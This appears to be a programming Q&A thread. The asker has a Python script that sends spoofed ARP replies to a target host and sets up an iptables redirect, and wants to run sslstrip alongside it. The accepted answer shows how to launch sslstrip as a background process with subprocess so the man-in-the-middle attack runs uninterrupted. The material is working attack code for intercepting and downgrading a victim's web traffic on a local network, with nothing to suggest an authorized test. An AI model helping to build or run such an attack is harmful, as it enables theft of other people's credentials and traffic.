# python run 2 processes

Tags: python, multithreading, process, network-programming

I have already coded a program that does arpspoofing and now I want to call sslstrip while I keep sending arp replays.

I am not sure if that would work better with threads or how, I just would like to know what is the easiest solution.

This is what I have tried and don't get to send the arp replays (get stuck in the sslstrip process):

```
os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000")

os.system("sslstrip -l 1000 -w cap.txt")


while True:
    try:
        time.sleep(2)
        print 'Injecting Arp Replay to '+target+' telling '+host+' is at '+mac
        s.send(packet)

    except KeyboardInterrupt:
        print "bye"
        os.system("iptables -t nat -D PREROUTING 1 ")
        sys.exit(1)
```

Does anyone know how to solve it in a easy way?

Answer (score 1, accepted):

You can use the [subprocess module](https://docs.python.org/2/library/subprocess.html#subprocess.Popen) instead of `os.system`

You can just open sslstrip as a background task and terminate it at the end of your script:

```
import subprocess
sslstrip = subprocess.Popen(["sslstrip", "-l", "1000", "-w", "cap.txt"], stdout=subprocess.PIPE)

# Run your script
# ...

# At the end terminate the process (in your KeyboardInterrput)
sslstrip.terminate()
```